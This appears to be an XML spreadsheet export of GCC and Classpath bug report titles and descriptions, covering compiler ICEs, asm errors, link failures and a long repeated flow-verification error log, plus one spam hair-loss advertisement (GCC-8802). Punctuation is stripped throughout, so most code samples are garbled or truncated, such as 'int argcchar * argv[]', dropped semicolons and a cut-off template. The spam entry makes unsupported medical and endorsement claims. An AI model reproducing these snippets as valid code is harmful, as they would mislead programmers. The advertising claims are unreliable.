intech20:/tmp$ cc -fPIC foo.c -o foo
foo.c: In function `main':
foo.c:6: Invalid `asm' statement:
foo.c:6: fixed or forbidden register 3 (bx) was spilled for class BREG.
intech20:/tmp$ cat foo1.c
int
main(int argcchar * argv[]) {
  int i=0
  __asm__ __volatile__ (addl $1%%ebx\n\t : : a (i) : ebx)
}
intech20:/tmp$ cc -fPIC foo1.c -o foo
intech20:/tmp$
Release:
3.1 (Debian) (Debian unstable)
Environment:
System: Debian GNU/Linux (unstable)
Architecture: i686
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (StatusErr: uppercase=bad)
||/ Name           Version        Description
+++-==============-==============-============================================
ii  gcc-3.1        3.1-2          The GNU C compiler.
ii  g++-3.1        3.1-2          The GNU C++ compiler.
ii  libstdc++4     3.1-2          The GNU stdc++ library version 3
ii  libstdc++4-dev 3.1-2          The GNU stdc++ library version 3 (developmen
ii  binutils       2.12.90.0.7-1  The GNU assembler linker and binary utiliti
ii  libc6          2.2.5-6        GNU C Library: Shared libraries and Timezone
host: i386-linux
configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1ds2/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=$\(prefix\)/share/man --infodir=$\(prefix\)/share/info --with-gxx-include-dir=$\(prefix\)/include/g++-v3-3.1 --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>73065</t>
  </si>
  <si>
    <t>GCC-30022</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2/4.3 regression] ICE on vector operand in division</t>
  </si>
  <si>
    <t>The following code snippet crashes the C++ frontend since GCC 4.0.0:
================================================
void foo()
{
  int __attribute__((vector_size(8))) v
  v = 1/v
}
================================================
bug.cc: In function 'void foo()':
bug.cc:4: internal compiler error: in type_after_usual_arithmetic_conversions at cp/typeck.c:266
Please submit a full bug report [etc.]
Will post a patch soon.</t>
  </si>
  <si>
    <t>GCC-40266</t>
  </si>
  <si>
    <t>march-native gives -mno-sse4 but cpuinfo sse4_1</t>
  </si>
  <si>
    <t>If I run gcc -fverbose-asm -mtune=native -march=native -S x.c
I get
cat x.s:
       .file   x.c
# GNU C (GCC) version 4.4.0 20090506 (Red Hat 4.4.0-4) (x86_64-redhat-linux)
#       compiled by GNU C version 4.4.0 20090506 (Red Hat 4.4.0-4) GMP
version 4.2.4 MPFR version 2.4.1.
# GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
# options passed:  x.c -march=core2 -mcx16 -msahf --param l1-cache-size=32
# --param l1-cache-line-size=64 --param l2-cache-size=2048 -mtune=core2
# -fverbose-asm
# options enabled:  -falign-loops -fargument-alias
...................
# -mfp-ret-in-387 -mfused-madd -mglibc -mieee-fp -mmmx -mno-sse4
# -mpush-args -mred-zone -msahf -msse -msse2 -msse3 -mssse3
............
cat /proc/cpuinfo:
flags           : .....sse sse2 .... ssse3 .... sse4_1 ...
It appears that since the cpu doesn't support both sse4.1 and sse4.2 gcc march-native disables sse4 altogether. Obviously -msse4.1 -mno-sse4.2 would be better.</t>
  </si>
  <si>
    <t>seandarcy2</t>
  </si>
  <si>
    <t>GCC-49989</t>
  </si>
  <si>
    <t>Assert_Failure sinfo.adb:638 on simple testcase</t>
  </si>
  <si>
    <t>$ gcc-4.7 -c p.adb
+===========================GNAT BUG DETECTED==============================+
| 4.7.0 20110805 (experimental) (x86_64-unknown-linux-gnu) Assert_Failure sinfo.adb:638|
| Error detected at p.adb:7:9                                              |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
Consider also -gnatd.n switch (see debug.adb).
p.adb
p.ads
compilation abandoned
-- Chop here --
-- p.ads
procedure P
-- p.adb
procedure P is
   type R is record
      I : Integer := 0
   end record
   X : access R
begin
   X := new R
end</t>
  </si>
  <si>
    <t>GCC-51099</t>
  </si>
  <si>
    <t>libgcc configure probe generates invalid code on MIPS</t>
  </si>
  <si>
    <t>Fri Nov 11 13:16:33 UTC 2011 (revision 181284)
Target mips-rtems4.11
Binutils:  2.22.51.20111028
GCC invocation on Configure probe generates code which doesn't assemble
configure:4514: checking whether to use setjmp/longjmp exceptions
configure:: /home2/joel/build/b-mips-gcc/./gcc/xgcc -B/home2/joel/build/b-mips-gcc/./gcc/ -nostdinc -B/home2/joel/build/b-mips-gcc/mips-rtems4.11/newlib/ -isystem /home2/joel/build/b-mips-gcc/mips-rtems4.11/newlib/targ-include -isystem /users/joel/test-gcc/gcc-svn/newlib/libc/include -B/users/joel/test-gcc/install-svn/mips-rtems4.11/bin/ -B/users/joel/test-gcc/install-svn/mips-rtems4.11/lib/ -isystem /users/joel/test-gcc/install-svn/mips-rtems4.11/include -isystem /users/joel/test-gcc/install-svn/mips-rtems4.11/sys-include    -c --save-temps -fexceptions  conftest.c &gt;&amp;5
conftest.s: Assembler messages:
conftest.s:124: Error: invalid operands (*UND* and .text sections) for `-'
conftest.s:128: Error: invalid operands (*UND* and .text sections) for `-'</t>
  </si>
  <si>
    <t>GCC-8957</t>
  </si>
  <si>
    <t>gcj: libgcj.spec: No such file or directory</t>
  </si>
  <si>
    <t>Freshly installed the complete GCC 3.2.1 package.
Compiled OK after applying patch to ./gcc/ginclude/stddef.h
prompt&gt; gcj -v
Reading specs from /usr/local/lib/gcc-lib/powerpc-apple-darwin6.2/3.2.1/specs
Reading specs from libgcj.spec
gcj: libgcj.spec: No such file or directory
I can find libgcj.spec.in but using this file results in further errors.
Release:
gcj (GCC) 3.2.1
Environment:
 powerpc-apple-darwin6.2
Jaguar OS 10.2.2
How-To-Repeat:
Fresh install of package try to use gcj.</t>
  </si>
  <si>
    <t>aharwood</t>
  </si>
  <si>
    <t>GCC-37649</t>
  </si>
  <si>
    <t>[4.4 regression] ICE with invalid template class</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline:
==================================
struct A
{
  template struct {}
}
==================================
bug.cc:3: error: template class without a name
bug.cc:3: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
The regression was introduced between 2008-05-13 and 2008-06-21.</t>
  </si>
  <si>
    <t>GCC-51258</t>
  </si>
  <si>
    <t>64-bit gcc.dg/atomic-compare-exchange-5.c link failure on 32-bit Solaris/x86</t>
  </si>
  <si>
    <t>Several 64-bit atomic-* tests fail to link with a 32-bit Solaris/x86 gcc:
Running target unix/-m64
FAIL: gcc.dg/atomic-compare-exchange-5.c (test for excess errors)
WARNING: gcc.dg/atomic-compare-exchange-5.c compilation failed to produce executable
FAIL: gcc.dg/atomic-exchange-5.c (test for excess errors)
WARNING: gcc.dg/atomic-exchange-5.c compilation failed to produce executable
FAIL: gcc.dg/atomic-load-5.c execution test
FAIL: gcc.dg/atomic-op-5.c (test for excess errors)
WARNING: gcc.dg/atomic-op-5.c compilation failed to produce executable
FAIL: gcc.dg/atomic-store-5.c (test for excess errors)
WARNING: gcc.dg/atomic-store-5.c compilation failed to produce executable
E.g. 
FAIL: gcc.dg/atomic-compare-exchange-5.c (test for excess errors)
Excess errors:
Undefined			first referenced
 symbol  			    in file
__atomic_compare_exchange_16        /var/tmp//ccSEaa.G.o
FAIL: gcc.dg/atomic-exchange-5.c (test for excess errors)
Excess errors:
Undefined			first referenced
 symbol  			    in file
__atomic_exchange_16                /var/tmp//cci5aWbI.o
FAIL: gcc.dg/atomic-op-5.c (test for excess errors)
Excess errors:
Undefined			first referenced
 symbol  			    in file
__atomic_fetch_nand_16              /var/tmp//ccnFaOtM.o
__atomic_fetch_or_16                /var/tmp//ccnFaOtM.o
__atomic_fetch_add_16               /var/tmp//ccnFaOtM.o
__atomic_fetch_and_16               /var/tmp//ccnFaOtM.o
__atomic_fetch_xor_16               /var/tmp//ccnFaOtM.o
__atomic_fetch_sub_16               /var/tmp//ccnFaOtM.o
FAIL: gcc.dg/atomic-store-5.c (test for excess errors)
Excess errors:
Undefined			first referenced
 symbol  			    in file
__atomic_store_16                   /var/tmp//ccV8ayIN.o</t>
  </si>
  <si>
    <t>GCC-5802</t>
  </si>
  <si>
    <t>spurious might be used uninitialized warning with dynamic_cast</t>
  </si>
  <si>
    <t>g++ -W -O (both 2.95.4-20011002 and 3.0.4 final) warns:
dyncast.cpp: In function `int test_func(group *)':
dyncast.cpp:22: warning: `class derived * dptr' might be used   uninitialized in this function
Intel's C++ compiler accepts the code and I don't understand why g++ thinks it is used without initialization (or why using an int instead of string argument to get() makes the warning disappear) so I assume it's a g++ bug.
Release:
gcc-3.0.4
Environment:
Debian i686-linux-gnu unstable
How-To-Repeat:
compile with g++ -W -O -c dyncast.cpp</t>
  </si>
  <si>
    <t>poole</t>
  </si>
  <si>
    <t>GCC-8802</t>
  </si>
  <si>
    <t>GREAT X'MAS PRESENT</t>
  </si>
  <si>
    <t xml:space="preserve"> HK$500.00 off if you buy before Weds 11th Dec 2002
 Break through in HAIR LOSS cure.
 Please visit http://www.lasercomb-asia.com
 The first personal laser to solve hairloss.
 1) TIME Magazine - invention of the year.
 2) Developed in Sydney Australia from 13 years of clinical experience.
 3) Made in USA with patent pending in 104 countries.
 4) Saves money for both men and women.
 5) Complies with US FDA safety regulations.
 6) Safe effective without side effects.
 7) FREE Delivery FOR Hong Kong.
 Using the Lasercomb for just twice a week 10 mins each time
 you can see results that would cost thousand of dollars
 in expensive medical clinics.
 The smart way for a Thicker Healthier hair!
 To unsubscribe reply to this email with REMOVE in email subject
 HOTLINE: +852 21868428
Release:
unknown</t>
  </si>
  <si>
    <t>CLASSPATH-26503</t>
  </si>
  <si>
    <t>IS_PREFIX_DEFAULTING should be called IS_REPAIRING_NAMESPACES in XMLOutputFactory</t>
  </si>
  <si>
    <t>In class javax.xml.stream.XMLOutputFactory the field IS_PREFIX_DEFAULTING should be called IS_REPAIRING_NAMESPACES according to the final JSR spec.</t>
  </si>
  <si>
    <t>GCC-60728</t>
  </si>
  <si>
    <t>recover() should not work in recursive deferred fucntions</t>
  </si>
  <si>
    <t>From an email discussion between me and with Ian Lance Taylor about the function statements.cc:build_thunk():
Ian Lance Taylor wrote:
&gt; On Fri Mar 28 2014 at 3:37 AM Dominik Vogt  wrote:
&gt; &gt; (First note that I think there's a bug in the current code with
&gt; &gt; recursive calls of functions with recover.  Consider this:
&gt; &gt;
&gt; &gt;   func f() {
&gt; &gt;     defer g(0)
&gt; &gt;     ...
&gt; &gt;   }
&gt; &gt;
&gt; &gt;   func g(n int) {
&gt; &gt;     if n == 0 {
&gt; &gt;       g(1)
&gt; &gt;     } else {
&gt; &gt;       recover()
&gt; &gt;     }
&gt; &gt;   }
&gt; &gt;
&gt; &gt; With the current logic the recursive call of g() would recover
&gt; &gt; (__go_gan_recover returns true) but it shouldn't because it's not
&gt; &gt; called directly.  The following sketch takes care of that
&gt; &gt; situation.)
&gt;
&gt; Good point.</t>
  </si>
  <si>
    <t>GCC-6358</t>
  </si>
  <si>
    <t>GCC 3.1 ICE on statement expressions</t>
  </si>
  <si>
    <t>gcc-3.1-branch ICEs on some statement expression returning void and enclosed in a function returning a value of floating type.
[gb@kernel gcc]$ ./cc1 ~/vrac/stmt_expr.c
 f
/home/gb/vrac/stmt_expr.c: In function `f':
/home/gb/vrac/stmt_expr.c:7: Internal compiler error in subst_stack_regs_pat at reg-stack.c:1441
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
GNU C version 3.1 20020418 (prerelease) (i686-pc-linux-gnu)
Environment:
i586-mandrake-linux-gnu
How-To-Repeat:
You can compile the following testcase with or without any optimazations. The testcase came up while distilling a similar ICE for ggv 1.99.3 (bonobo/ggv-postscript-view.c).
void g()
double f()
{
  (void) ({ g() return })
  return 0.0
}</t>
  </si>
  <si>
    <t>GCC-48531</t>
  </si>
  <si>
    <t>[C++0x][SFINAE] Hard errors with arrays of unknown bound</t>
  </si>
  <si>
    <t>The following program should be well-formed but is not:
template&lt;class T
  class = decltype(T())
&gt;
char f(int)
template
char (
static_assert(sizeof(f(0)) != 1 Error) 
cannot value-initialize array of unknown bound â€˜int []â€™</t>
  </si>
  <si>
    <t>GCC-750</t>
  </si>
  <si>
    <t>Field out of range Error while using g++ on HP 10.20</t>
  </si>
  <si>
    <t xml:space="preserve"> Anybody to help me out there!!!
 I'm getting the following error while compiling a 32767 lines 1115527 Bytes big file.
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (523160).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (523152).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (523144).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (523136).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (523128).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (523120).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (523112).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (523104).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (522888).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (522872).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (522832).
 &gt; /var/tmp/ccJmzF03.s:239894: Error: Field out of range [-262144..262143] (522824).
 I'm using  gcc version 2.9-gnupro-98r2 
            HP-UX B.10.20 A 9000/819
 Thanks in Advance
 Arasu
Release:
unknown</t>
  </si>
  <si>
    <t>arasu</t>
  </si>
  <si>
    <t>GCC-69806</t>
  </si>
  <si>
    <t>[6 Regression][SH] Combine doesn't see constant</t>
  </si>
  <si>
    <t>Some time between
https://gcc.gnu.org/ml/gcc-testresults/2016-02/msg00444.html
and
https://gcc.gnu.org/ml/gcc-testresults/2016-02/msg00698.html
there seem to have been a combine related change which triggered:
FAIL: gcc.target/sh/pr64345-1.c scan-assembler-not exts|extu|sha|shld|subc|xor
FAIL: gcc.target/sh/pr64345-1.c scan-assembler-times shlr\\t 8
The following sub-test exhibits the problem:
int test_int64_t_shift_2_4 (signed long long x)
{
  return (x 
}
Before it would compile (with -O2 -m4 -ml) to:
        mov     r4r0
        tst     #4r0
        rts
        movt    r0
Now it's:
        mov     #30r0
        shld    r0r5
        shlr2   r4
        or      r5r4
        mov     r4r0
        tst     #1r0
        rts
        movt    r0
This happens only for SH targets which have dynamic shifts (SH3* SH4* SH2A).  The dynamic shift insns need the shift count loaded in a reg and are expanded as such.  Combine would then eventually arrive at the single bit extraction pattern:
Successfully matched this instruction:
(parallel [
        (set (reg:SI 173)
            (and:SI (and:SI (lshiftrt:SI (xor:SI (reg:SI 4 r4 [ x ])
                            (const_int 4 [0x4]))
                        (const_int 2 [0x2]))
                    (not:SI (ashift:SI (reg:SI 5 r5 [ x+4 ])
                            (const_int 30 [0x1e]))))
                (const_int 1 [0x1])))
        (clobber (reg:SI 147 t))
    ])
However now the (const_int 30) doesn't get propagated anymore and it tries:
Failed to match this instruction:
(set (reg:SI 173)
    (and:SI (and:SI (lshiftrt:SI (xor:SI (reg:SI 4 r4 [ x ])
                    (const_int 4 [0x4]))
                (const_int 2 [0x2]))
            (not:SI (ashift:SI (reg:SI 5 r5 [ x+4 ])
                    (reg:SI 170))))
        (const_int 1 [0x1])))
.. for which there is no pattern.  Thus the bit test doesn't get optimized.</t>
  </si>
  <si>
    <t>GCC-10648</t>
  </si>
  <si>
    <t>template instantiation doesn't respect evaluation order of &amp;&amp;</t>
  </si>
  <si>
    <t>I apologize in advance if I'm not reporting this bug
absolutely correctly. I haven't done this before. I
appreciate your patience. Thank you.
I believe my template should evaluate is_class::value first and if it returns false should NOT evaluate
sizeof(is_empty_helper_class_1) ==
sizeof(is_empty_helper_class_2) but it seems to anyway.
Is this pilot error or a compiler bug?
Release:
gcc version 3.2 20020927 (prerelease)
Environment:
in bash via cygwin on windows 98 se
How-To-Repeat:
g++ is_empty.cpp
./a.exe</t>
  </si>
  <si>
    <t>notbob</t>
  </si>
  <si>
    <t>GCC-13034</t>
  </si>
  <si>
    <t>[3.4 Regression] Segfault at the end of stage3</t>
  </si>
  <si>
    <t>stage2/xgcc -Bstage2/ -B/usr/local/sparc-sun-solaris2.8/bin/ -c   -g -O2
-DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes
-pedantic -Wno-long-long -Wold-style-definition -Werror -fno-common  
-DHAVE_CONFIG_H    -I. -I. -I../../gcc -I../../gcc/. -I../../gcc/../include
-I../intl ../../gcc/cfgcleanup.c -o cfgcleanup.o
../../gcc/cfgcleanup.c: In function `try_crossjump_to_edge':
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
272-&gt;273 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
272-&gt;274 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
270-&gt;271 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
270-&gt;272 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
260-&gt;261 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
260-&gt;263 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
257-&gt;258 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
257-&gt;259 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
253-&gt;254 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
253-&gt;256 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
241-&gt;242 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
241-&gt;270 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
239-&gt;240 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
239-&gt;241 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
236-&gt;237 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
236-&gt;238 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
234-&gt;235 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
234-&gt;236 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
231-&gt;232 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
231-&gt;233 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
229-&gt;230 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
229-&gt;234 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
228-&gt;229 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
228-&gt;234 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
226-&gt;227 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
226-&gt;234 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
224-&gt;225 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
224-&gt;226 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
222-&gt;223 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
222-&gt;224 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
221-&gt;222 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
221-&gt;224 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
217-&gt;218 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
217-&gt;221 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
216-&gt;217 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
216-&gt;224 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
214-&gt;215 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
214-&gt;216 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
213-&gt;214 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
213-&gt;216 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
209-&gt;210 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
209-&gt;213 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
208-&gt;209 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
208-&gt;216 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
203-&gt;204 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
203-&gt;205 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
202-&gt;203 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
202-&gt;205 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
200-&gt;201 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
200-&gt;202 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
198-&gt;199 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
198-&gt;200 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
197-&gt;198 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
197-&gt;206 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
190-&gt;191 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
190-&gt;194 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
189-&gt;190 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
189-&gt;194 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
183-&gt;184 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
183-&gt;189 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
182-&gt;183 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
182-&gt;188 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
178-&gt;179 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
178-&gt;180 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
176-&gt;177 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
176-&gt;180 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
174-&gt;175 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
174-&gt;181 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
173-&gt;174 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
173-&gt;176 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
170-&gt;171 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
170-&gt;173 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
169-&gt;170 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
169-&gt;172 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
167-&gt;168 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
167-&gt;169 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
164-&gt;165 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
164-&gt;166 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
163-&gt;164 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
163-&gt;165 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
162-&gt;163 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
162-&gt;166 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
158-&gt;159 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
158-&gt;160 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
151-&gt;152 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
151-&gt;160 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
138-&gt;139 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
138-&gt;148 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
131-&gt;132 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
131-&gt;134 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
116-&gt;117 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
116-&gt;124 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
114-&gt;115 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
114-&gt;127 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
113-&gt;114 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
113-&gt;126 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
112-&gt;113 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
112-&gt;125 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
108-&gt;109 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
108-&gt;112 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
106-&gt;107 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
106-&gt;135 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
105-&gt;106 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
105-&gt;136 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
103-&gt;104 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
103-&gt;136 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
100-&gt;101 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
100-&gt;102 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
96-&gt;97 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
96-&gt;98 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
92-&gt;93 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
92-&gt;94 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
90-&gt;91 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
90-&gt;99 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
89-&gt;90 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
89-&gt;99 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
85-&gt;86 -2147473648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
85-&gt;88 -2147483648
../../gcc/cfgcleanup.c:1562: error: verify_flow_info: Wrong probability of edge
84-&gt;85 -2147473648
